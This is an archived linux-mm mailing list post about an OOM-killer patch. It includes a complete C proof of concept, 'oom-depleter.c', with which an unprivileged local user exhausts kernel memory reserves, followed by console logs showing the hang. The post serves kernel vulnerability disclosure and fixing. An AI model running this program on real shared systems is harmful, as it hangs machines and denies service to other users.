[REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF

linux-mm.kvack.org archive mirror
 help / color / mirror / Atom feed

* [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
@ 2015-08-23  7:19 Tetsuo Handa
  2015-08-24  9:47 ` Michal Hocko
                   ` (2 more replies)
  0 siblings, 3 replies; 14+ messages in thread
From: Tetsuo Handa @ 2015-08-23  7:19 UTC (permalink / raw)
  To: mhocko, rientjes, hannes; +Cc: linux-mm

Quoting from http://www.spinics.net/lists/linux-mm/msg89366.html
> On Mon 01-06-15 22:04:28, Tetsuo Handa wrote:
> > Michal Hocko wrote:
> > > > Likewise, move do_send_sig_info(SIGKILL, victim) to before
> > > > mark_oom_victim(victim) in case for_each_process() took very long time,
> > > > for the OOM victim can abuse ALLOC_NO_WATERMARKS by TIF_MEMDIE via e.g.
> > > > memset() in user space until SIGKILL is delivered.
> > > 
> > > This is unrelated and I believe even not necessary.
> > 
> > Why unnecessary? If serial console is configured and printing a series of
> > "Kill process %d (%s) sharing same memory" took a few seconds, the OOM
> > victim can consume all memory via malloc() + memset(), can't it?
> 
> Can? You are generating one corner case after another. All of them
> without actually showing it can happen in the real life. There are
> million+1 corner cases possible yet we would prefer to handle those that
> have changes to happen in the real life. So let's focus on the real life
> scenarios.
> 
> > What to do if the OOM victim cannot die immediately after consuming
> > all memory? I think that sending SIGKILL before setting TIF_MEMDIE
> > helps reducing consumption of memory reserves.
> 
> I think that SIGKILL before or after mark_oom_victim has close to zero
> effect. If you think that we should send SIGKILL before looking for
> tasks sharing mm then why not - BUT AGAIN A SEPARATE PATCH WITH A
> JUSTIFICATION please.

I tried to reproducing what I worried at
http://www.spinics.net/lists/linux-mm/msg82342.html . I confirmed that a
local unprivileged user can consume all memory reserves using the time lag.

---------- oom-depleter.c start ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>

static int null_fd = EOF;
static char *buf = NULL;
static unsigned long size = 0;

static int dummy(void *unused)
{
	pause();
	return 0;
}

static int trigger(void *unused)
{
        read(null_fd, buf, size); /* Will cause OOM due to overcommit */
	return 0;
}

int main(int argc, char *argv[])
{
        int pipe_fd[2] = { EOF, EOF };
	unsigned long i;
	null_fd = open("/dev/zero", O_RDONLY);
	pipe(pipe_fd);
	for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
	/*
	 * Create many child threads in order to enlarge time lag between
	 * the OOM killer sets TIF_MEMDIE to thread group leader and
	 * the OOM killer sends SIGKILL to that thread.
	 */
	for (i = 0; i < 1000; i++) {
		clone(dummy, malloc(1024) + 1024, CLONE_SIGHAND | CLONE_VM,
		      NULL);
		if (!i)
			close(pipe_fd[1]);
        }
	/* Let a child thread trigger the OOM killer. */
	clone(trigger, malloc(4096)+ 4096, CLONE_SIGHAND | CLONE_VM, NULL);
	/* Wait until the first child thread is killed by the OOM killer. */
	read(pipe_fd[0], &i, 1);
	/* Deplete all memory reserve using the time lag. */
	for (i = size; i; i -= 4096)
		buf[i - 1] = 1;
	return * (char *) NULL; /* Kill all threads. */
}
---------- oom-depleter.c end ----------

Checked memory reserve at 38.613801.
Launched oom-depleter around 40.
OOM-killer was invoked at 48.046321.
The thread group leader got TIF_MEMDIE at 50.064684.
The thread group leader depleted all memory reserves at 50.248677.
The thread group leader received SIGKILL at 52.299532.
Memory reserve not yet recovered as of 85.966108.
Memory reserve not yet recovered as of 185.044658.
Gave up waiting and restarted at 205.509157.

---------- console log start ----------
[   38.613801] sysrq: SysRq : Show Memory
[   38.616506] Mem-Info:
[   38.618106] active_anon:18185 inactive_anon:2085 isolated_anon:0
[   38.618106]  active_file:10615 inactive_file:18972 isolated_file:0
[   38.618106]  unevictable:0 dirty:7 writeback:0 unstable:0
[   38.618106]  slab_reclaimable:3015 slab_unreclaimable:4217
[   38.618106]  mapped:9940 shmem:2146 pagetables:1319 bounce:0
[   38.618106]  free:378300 free_pcp:486 free_cma:0
[   38.640475] Node 0 DMA free:9980kB min:400kB low:500kB high:600kB active_anon:2924kB inactive_anon:80kB active_file:816kB inactive_file:896kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:596kB shmem:80kB slab_reclaimable:240kB slab_unreclaimable:308kB kernel_stack:80kB pagetables:64kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   38.655621] lowmem_reserve[]: 0 1731 1731 1731
[   38.657497] Node 0 DMA32 free:1503220kB min:44652kB low:55812kB high:66976kB active_anon:69816kB inactive_anon:8260kB active_file:41644kB inactive_file:74992kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:28kB writeback:0kB mapped:39164kB shmem:8504kB slab_reclaimable:11820kB slab_unreclaimable:16560kB kernel_stack:3472kB pagetables:5212kB unstable:0kB bounce:0kB free_pcp:1944kB local_pcp:668kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   38.672950] lowmem_reserve[]: 0 0 0 0
[   38.673726] Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
[   38.676854] Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB
[   38.680159] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   38.681517] 31733 total pagecache pages
[   38.682162] 0 pages in swap cache
[   38.682711] Swap cache stats: add 0, delete 0, find 0/0
[   38.683554] Free swap  = 0kB
[   38.684053] Total swap = 0kB
[   38.684528] 524157 pages RAM
[   38.685022] 0 pages HighMem/MovableOnly
[   38.685645] 76583 pages reserved
[   38.686173] 0 pages hwpoisoned
[   48.046321] oom-depleter invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0
[   48.047754] oom-depleter cpuset=/ mems_allowed=0
[   48.048779] CPU: 1 PID: 4797 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80
[   48.050612] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   48.052434]  0000000000000000 000000004ecba3fc ffff88006c4938d0 ffffffff81614c2f
[   48.053816]  ffff88006c482580 ffff88006c493970 ffffffff81611671 0000000000001000
[   48.055218]  ffff88006c493918 ffffffff8109463c ffff8800784b2b40 ffff88007fc556f8
[   48.057428] Call Trace:
[   48.058775]  [<ffffffff81614c2f>] dump_stack+0x44/0x55
[   48.060647]  [<ffffffff81611671>] dump_header+0x84/0x21c
[   48.062591]  [<ffffffff8109463c>] ? update_curr+0x9c/0xe0
[   48.064393]  [<ffffffff810917f7>] ? __enqueue_entity+0x67/0x70
[   48.066506]  [<ffffffff81096b59>] ? set_next_entity+0x69/0x360
[   48.068633]  [<ffffffff81091ee0>] ? pick_next_entity+0xa0/0x150
[   48.070768]  [<ffffffff8110fad4>] oom_kill_process+0x364/0x3d0
[   48.072874]  [<ffffffff81281550>] ? security_capable_noaudit+0x40/0x60
[   48.074948]  [<ffffffff8110fd83>] out_of_memory+0x1f3/0x490
[   48.076820]  [<ffffffff81115214>] __alloc_pages_nodemask+0x904/0x930
[   48.078885]  [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[   48.080781]  [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[   48.082936]  [<ffffffff8112ffce>] ? vmacache_find+0x1e/0xc0
[   48.084981]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[   48.086791]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[   48.088636]  [<ffffffff81096b59>] ? set_next_entity+0x69/0x360
[   48.090630]  [<ffffffff8161c918>] page_fault+0x28/0x30
[   48.092359]  [<ffffffff813124c0>] ? __clear_user+0x20/0x50
[   48.094065]  [<ffffffff81316dd8>] iov_iter_zero+0x68/0x250
[   48.095939]  [<ffffffff813e9ef8>] read_iter_zero+0x38/0xa0
[   48.097690]  [<ffffffff8117ad04>] __vfs_read+0xc4/0xf0
[   48.099545]  [<ffffffff8117b489>] vfs_read+0x79/0x120
[   48.101129]  [<ffffffff8117c1a0>] SyS_read+0x50/0xc0
[   48.102648]  [<ffffffff8161adee>] entry_SYSCALL_64_fastpath+0x12/0x71
[   48.104388] Mem-Info:
[   48.105396] active_anon:410470 inactive_anon:2085 isolated_anon:0
[   48.105396]  active_file:0 inactive_file:31 isolated_file:0
[   48.105396]  unevictable:0 dirty:0 writeback:0 unstable:0
[   48.105396]  slab_reclaimable:1689 slab_unreclaimable:5719
[   48.105396]  mapped:390 shmem:2146 pagetables:2097 bounce:0
[   48.105396]  free:12966 free_pcp:63 free_cma:0
[   48.114279] Node 0 DMA free:7308kB min:400kB low:500kB high:600kB active_anon:6764kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[   48.124147] lowmem_reserve[]: 0 1731 1731 1731
[   48.125753] Node 0 DMA32 free:44556kB min:44652kB low:55812kB high:66976kB active_anon:1635116kB inactive_anon:8260kB active_file:0kB inactive_file:124kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1552kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:252kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:1620 all_unreclaimable? yes
[   48.137007] lowmem_reserve[]: 0 0 0 0
[   48.138514] Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
[   48.143010] Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB
[   48.148196] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   48.150810] 2156 total pagecache pages
[   48.152318] 0 pages in swap cache
[   48.154200] Swap cache stats: add 0, delete 0, find 0/0
[   48.156089] Free swap  = 0kB
[   48.157400] Total swap = 0kB
[   48.158694] 524157 pages RAM
[   48.160055] 0 pages HighMem/MovableOnly
[   48.161496] 76583 pages reserved
[   48.162989] 0 pages hwpoisoned
[   48.164453] [ pid ]   uid  tgid total_vm      rss nr_ptes nr_pmds swapents oom_score_adj name
(...snipped...)
[   50.061069] [ 4797]  1000  4797   541715   392157     776       6        0             0 oom-depleter
[   50.062841] Out of memory: Kill process 3796 (oom-depleter) score 877 or sacrifice child
[   50.064684] Killed process 3796 (oom-depleter) total-vm:2166860kB, anon-rss:1568628kB, file-rss:0kB
[   50.066454] Kill process 3797 (oom-depleter) sharing same memory
(...snipped...)
[   50.247563] Kill process 3939 (oom-depleter) sharing same memory
[   50.248677] oom-depleter: page allocation failure: order:0, mode:0x280da
[   50.248679] CPU: 2 PID: 3796 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80
[   50.248680] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   50.248682]  0000000000000000 000000001529812f ffff88007be67be0 ffffffff81614c2f
[   50.248683]  00000000000280da ffff88007be67c70 ffffffff81111914 0000000000000000
[   50.248684]  ffff88007fffdb28 0000000000000000 ffff88007fc99030 ffff88007be67d30
[   50.248684] Call Trace:
[   50.248689]  [<ffffffff81614c2f>] dump_stack+0x44/0x55
[   50.248692]  [<ffffffff81111914>] warn_alloc_failed+0xf4/0x150
[   50.248693]  [<ffffffff81114b76>] __alloc_pages_nodemask+0x266/0x930
[   50.248695]  [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[   50.248697]  [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[   50.248702]  [<ffffffff8100d6dc>] ? __switch_to+0x23c/0x470
[   50.248704]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[   50.248706]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[   50.248707]  [<ffffffff8161c918>] page_fault+0x28/0x30
[   50.248708] Mem-Info:
[   50.248710] active_anon:423405 inactive_anon:2085 isolated_anon:0
[   50.248710]  active_file:7 inactive_file:10 isolated_file:0
[   50.248710]  unevictable:0 dirty:0 writeback:0 unstable:0
[   50.248710]  slab_reclaimable:1689 slab_unreclaimable:5719
[   50.248710]  mapped:393 shmem:2146 pagetables:2097 bounce:0
[   50.248710]  free:0 free_pcp:21 free_cma:0
[   50.248714] Node 0 DMA free:28kB min:400kB low:500kB high:600kB active_anon:13988kB inactive_anon:80kB active_file:28kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:4 all_unreclaimable? no
[   50.248715] lowmem_reserve[]: 0 1731 1731 1731
[   50.248717] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1679632kB inactive_anon:8260kB active_file:0kB inactive_file:48kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1576kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:84kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   50.248718] lowmem_reserve[]: 0 0 0 0
[   50.248721] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   50.248723] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   50.248724] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   50.248724] 2149 total pagecache pages
[   50.248725] 0 pages in swap cache
[   50.248725] Swap cache stats: add 0, delete 0, find 0/0
[   50.248725] Free swap  = 0kB
[   50.248726] Total swap = 0kB
[   50.248726] 524157 pages RAM
[   50.248726] 0 pages HighMem/MovableOnly
[   50.248726] 76583 pages reserved
[   50.248727] 0 pages hwpoisoned
(...snipped...)
[   50.248940] oom-depleter: page allocation failure: order:0, mode:0x280da
[   50.248940] CPU: 2 PID: 3796 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80
[   50.248940] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   50.248941]  0000000000000000 000000001529812f ffff88007be67be0 ffffffff81614c2f
[   50.248942]  00000000000280da ffff88007be67c70 ffffffff81111914 0000000000000000
[   50.248942]  ffff88007fffdb28 0000000000000000 ffff88007fc99030 ffff88007be67d30
[   50.248942] Call Trace:
[   50.248943]  [<ffffffff81614c2f>] dump_stack+0x44/0x55
[   50.248944]  [<ffffffff81111914>] warn_alloc_failed+0xf4/0x150
[   50.248945]  [<ffffffff81114b76>] __alloc_pages_nodemask+0x266/0x930
[   50.248946]  [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[   50.248947]  [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[   50.248948]  [<ffffffff81110080>] ? pagefault_out_of_memory+0x60/0xb0
[   50.248949]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[   50.248950]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[   50.248951]  [<ffffffff8161c918>] page_fault+0x28/0x30
[   50.248951] Mem-Info:
[   50.248952] active_anon:423405 inactive_anon:2085 isolated_anon:0
[   50.248952]  active_file:7 inactive_file:10 isolated_file:0
[   50.248952]  unevictable:0 dirty:0 writeback:0 unstable:0
[   50.248952]  slab_reclaimable:1689 slab_unreclaimable:5719
[   50.248952]  mapped:393 shmem:2146 pagetables:2097 bounce:0
[   50.248952]  free:0 free_pcp:21 free_cma:0
[   50.248954] Node 0 DMA free:28kB min:400kB low:500kB high:600kB active_anon:13988kB inactive_anon:80kB active_file:28kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:4 all_unreclaimable? no
[   50.248955] lowmem_reserve[]: 0 1731 1731 1731
[   50.248957] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1679632kB inactive_anon:8260kB active_file:0kB inactive_file:48kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1576kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:84kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   50.248957] lowmem_reserve[]: 0 0 0 0
[   50.248959] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   50.248961] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   50.248961] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   50.248962] 2149 total pagecache pages
[   50.248962] 0 pages in swap cache
[   50.248962] Swap cache stats: add 0, delete 0, find 0/0
[   50.248962] Free swap  = 0kB
[   50.248962] Total swap = 0kB
[   50.248963] 524157 pages RAM
[   50.248963] 0 pages HighMem/MovableOnly
[   50.248963] 76583 pages reserved
[   50.248963] 0 pages hwpoisoned
[   51.212857] Kill process 3940 (oom-depleter) sharing same memory
(...snipped...)
[   52.299532] Kill process 4797 (oom-depleter) sharing same memory
[   85.966108] sysrq: SysRq : Show Memory
[   85.967079] Mem-Info:
[   85.967643] active_anon:423788 inactive_anon:2085 isolated_anon:0
[   85.967643]  active_file:0 inactive_file:1 isolated_file:0
[   85.967643]  unevictable:0 dirty:0 writeback:0 unstable:0
[   85.967643]  slab_reclaimable:1689 slab_unreclaimable:5401
[   85.967643]  mapped:391 shmem:2146 pagetables:2123 bounce:0
[   85.967643]  free:4 free_pcp:0 free_cma:0
[   85.974400] Node 0 DMA free:0kB min:400kB low:500kB high:600kB active_anon:14076kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:340kB kernel_stack:240kB pagetables:572kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:8 all_unreclaimable? yes
[   85.983232] lowmem_reserve[]: 0 1731 1731 1731
[   85.984550] Node 0 DMA32 free:16kB min:44652kB low:55812kB high:66976kB active_anon:1681076kB inactive_anon:8260kB active_file:0kB inactive_file:4kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1556kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:21264kB kernel_stack:19328kB pagetables:7920kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   85.994326] lowmem_reserve[]: 0 0 0 0
[   85.995638] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   85.998389] Node 0 DMA32: 3*4kB (UM) 1*8kB (U) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 36kB
[   86.001506] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   86.003604] 2147 total pagecache pages
[   86.004878] 0 pages in swap cache
[   86.006083] Swap cache stats: add 0, delete 0, find 0/0
[   86.007638] Free swap  = 0kB
[   86.008793] Total swap = 0kB
[   86.009941] 524157 pages RAM
[   86.011089] 0 pages HighMem/MovableOnly
[   86.012413] 76583 pages reserved
[   86.013632] 0 pages hwpoisoned
[  125.269135] sysrq: SysRq : Show State
[  125.270536]   task                        PC stack   pid father
[  125.272269] systemd         S ffff88007cc07a08     0     1      0 0x00000000
[  125.274343]  ffff88007cc07a08 ffff88007cc08000 ffff88007cc08000 ffff88007cc07a40
[  125.276505]  ffff88007fc0db00 00000000fffd55be ffff88007fffc000 ffff88007cc07a20
[  125.278661]  ffffffff8161793e ffff88007fc0db00 ffff88007cc07aa8 ffffffff81619fcd
[  125.280844] Call Trace:
[  125.282076]  [<ffffffff8161793e>] schedule+0x2e/0x70
[  125.283698]  [<ffffffff81619fcd>] schedule_timeout+0x11d/0x1c0
[  125.285481]  [<ffffffff810be7c0>] ? cascade+0x90/0x90
[  125.287131]  [<ffffffff8111caef>] ? pfmemalloc_watermark_ok+0xaf/0xe0
[  125.289038]  [<ffffffff8111ccee>] throttle_direct_reclaim+0x1ce/0x240
[  125.290955]  [<ffffffff810a0870>] ? wait_woken+0x80/0x80
[  125.292676]  [<ffffffff81120bd0>] try_to_free_pages+0x80/0xc0
[  125.294478]  [<ffffffff81114e14>] __alloc_pages_nodemask+0x504/0x930
[  125.296401]  [<ffffffff8110cb07>] ? __page_cache_alloc+0x97/0xb0
[  125.298283]  [<ffffffff8115576c>] alloc_pages_current+0x8c/0x100
[  125.300141]  [<ffffffff8110cb07>] __page_cache_alloc+0x97/0xb0
[  125.301977]  [<ffffffff8110e728>] filemap_fault+0x218/0x490
[  125.303759]  [<ffffffff81237c79>] xfs_filemap_fault+0x39/0x60
[  125.305576]  [<ffffffff81132e69>] __do_fault+0x49/0xf0
[  125.307273]  [<ffffffff8113809f>] handle_mm_fault+0xe7f/0x1960
[  125.309100]  [<ffffffff811bac6e>] ? ep_scan_ready_list.isra.12+0x19e/0x1c0
[  125.311114]  [<ffffffff811badce>] ? ep_poll+0x11e/0x320
[  125.312841]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[  125.314643]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[  125.316363]  [<ffffffff8161c918>] page_fault+0x28/0x30
(...snipped...)
[  130.699717] oom-depleter    x ffff88007c06bc28     0  3797      1 0x00000086
[  130.701724]  ffff88007c06bc28 ffff88007a623e80 ffff88007c06c000 ffff88007a6241d0
[  130.703703]  ffff88007c6373e8 ffff88007a623e80 ffff88007cc08000 ffff88007c06bc40
[  130.705678]  ffffffff8161793e ffff88007a624450 ffff88007c06bcb0 ffffffff8106b0d7
[  130.707654] Call Trace:
[  130.708632]  [<ffffffff8161793e>] schedule+0x2e/0x70
[  130.710064]  [<ffffffff8106b0d7>] do_exit+0x677/0xae0
[  130.711535]  [<ffffffff8106b5ba>] do_group_exit+0x3a/0xb0
[  130.713037]  [<ffffffff81074d4f>] get_signal+0x17f/0x540
[  130.714537]  [<ffffffff8100e302>] do_signal+0x32/0x650
[  130.715991]  [<ffffffff81099ffc>] ? load_balance+0x1bc/0x8b0
[  130.717545]  [<ffffffff8100362d>] prepare_exit_to_usermode+0x9d/0xf0
[  130.719275]  [<ffffffff81003753>] syscall_return_slowpath+0xd3/0x1d0
[  130.720973]  [<ffffffff816173a4>] ? __schedule+0x274/0x7e0
[  130.722536]  [<ffffffff8161793e>] ? schedule+0x2e/0x70
[  130.723989]  [<ffffffff8161af4c>] int_ret_from_sys_call+0x25/0x8f
(...snipped...)
[  157.243284] oom-depleter    R  running task        0  4797      1 0x00000084
[  157.245131]  ffff88006c482580 000000004ecba3fc ffff88007fc83c38 ffffffff8108d14a
[  157.247105]  ffff88006c482580 ffff88006c4827c0 ffff88007fc83c78 ffffffff8108d23d
[  157.249092]  ffff88006c482970 000000004ecba3fc ffffffff8188b780 0000000000000074
[  157.251054] Call Trace:
[  157.252018]  <IRQ>  [<ffffffff8108d14a>] sched_show_task+0xaa/0x110
[  157.253740]  [<ffffffff8108d23d>] show_state_filter+0x8d/0xc0
[  157.255258]  [<ffffffff813cd31b>] sysrq_handle_showstate+0xb/0x20
[  157.256898]  [<ffffffff813cda24>] __handle_sysrq+0xf4/0x150
[  157.258442]  [<ffffffff813cde10>] sysrq_filter+0x360/0x3a0
[  157.259974]  [<ffffffff81497c12>] input_to_handler+0x52/0x100
[  157.261552]  [<ffffffff81499797>] input_pass_values.part.5+0x167/0x180
[  157.263270]  [<ffffffff81499afb>] input_handle_event+0xfb/0x4f0
[  157.264875]  [<ffffffff81499f3e>] input_event+0x4e/0x70
[  157.266366]  [<ffffffff814a18eb>] atkbd_interrupt+0x5bb/0x6a0
[  157.267929]  [<ffffffff81495101>] serio_interrupt+0x41/0x80
[  157.269457]  [<ffffffff81495d7a>] i8042_interrupt+0x1da/0x3a0
[  157.271017]  [<ffffffff810b0d3b>] handle_irq_event_percpu+0x2b/0x100
[  157.272678]  [<ffffffff810b0e4a>] handle_irq_event+0x3a/0x60
[  157.274224]  [<ffffffff810b3cb6>] handle_edge_irq+0xa6/0x140
[  157.275759]  [<ffffffff81010ad9>] handle_irq+0x19/0x30
[  157.277187]  [<ffffffff81010478>] do_IRQ+0x48/0xd0
[  157.278563]  [<ffffffff8161b8c7>] common_interrupt+0x87/0x87
[  157.280091]  <EOI>  [<ffffffff810a2eb9>] ? native_queued_spin_lock_slowpath+0x19/0x180
[  157.282070]  [<ffffffff8161a95c>] _raw_spin_lock+0x1c/0x20
[  157.283597]  [<ffffffff81130bcd>] __list_lru_count_one.isra.4+0x1d/0x50
[  157.285316]  [<ffffffff81130c1e>] list_lru_count_one+0x1e/0x20
[  157.286898]  [<ffffffff8117d610>] super_cache_count+0x50/0xd0
[  157.288477]  [<ffffffff8111d1d4>] shrink_slab.part.41+0xf4/0x280
[  157.290087]  [<ffffffff81120510>] shrink_zone+0x2c0/0x2d0
[  157.291595]  [<ffffffff81120894>] do_try_to_free_pages+0x164/0x420
[  157.293242]  [<ffffffff81120be4>] try_to_free_pages+0x94/0xc0
[  157.294799]  [<ffffffff81114e14>] __alloc_pages_nodemask+0x504/0x930
[  157.296474]  [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[  157.298019]  [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[  157.299606]  [<ffffffff8112ffce>] ? vmacache_find+0x1e/0xc0
[  157.301131]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[  157.302676]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[  157.304169]  [<ffffffff81096b59>] ? set_next_entity+0x69/0x360
[  157.305737]  [<ffffffff8161c918>] page_fault+0x28/0x30
[  157.307186]  [<ffffffff813124c0>] ? __clear_user+0x20/0x50
[  157.308699]  [<ffffffff81316dd8>] iov_iter_zero+0x68/0x250
[  157.310210]  [<ffffffff813e9ef8>] read_iter_zero+0x38/0xa0
[  157.311713]  [<ffffffff8117ad04>] __vfs_read+0xc4/0xf0
[  157.313155]  [<ffffffff8117b489>] vfs_read+0x79/0x120
[  157.314575]  [<ffffffff8117c1a0>] SyS_read+0x50/0xc0
[  157.315980]  [<ffffffff8161adee>] entry_SYSCALL_64_fastpath+0x12/0x71
[  157.317649] Showing busy workqueues and worker pools:
[  157.319070] workqueue events: flags=0x0
[  157.320261]   pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=4/256
[  157.321980]     pending: vmstat_shepherd, vmstat_update, e1000_watchdog [e1000], vmpressure_work_fn
[  157.324279] workqueue events_freezable: flags=0x4
[  157.325652]   pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256
[  157.327373]     pending: vmballoon_work [vmw_balloon]
[  157.328859] workqueue events_power_efficient: flags=0x80
[  157.330343]   pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256
[  157.332067]     pending: neigh_periodic_work
[  157.333431] workqueue events_freezable_power_: flags=0x84
